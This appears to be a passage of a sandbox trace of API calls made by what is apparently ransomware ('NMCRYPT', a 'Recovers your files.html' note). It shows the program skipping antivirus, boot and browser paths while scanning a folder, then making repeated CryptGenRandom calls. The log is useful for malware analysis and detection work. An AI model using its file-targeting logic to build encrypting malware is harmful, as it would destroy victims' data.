0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\ESET\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\AVG\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*Atheros*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*Realtek*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*bootmgr*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*boot*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*boot*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*IO.SYS*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*ntldr*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*chrome*") returned 0 [0159.309] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*opera*") returned 0 [0159.310] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", pszSpec="*firefox*") returned 0 [0159.310] wcslen (_String="\\\\?\\") returned 0x4 [0159.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad178 [0159.310] wcscmp (_String1=".", _String2=".") returned 0 [0159.310] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.310] wcscmp (_String1="..", _String2=".") returned 1 [0159.310] wcscmp (_String1="..", _String2="..") returned 0 [0159.310] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.310] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.311] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.311] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.311] strlen (_Str="NMoreira") returned 0x8 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 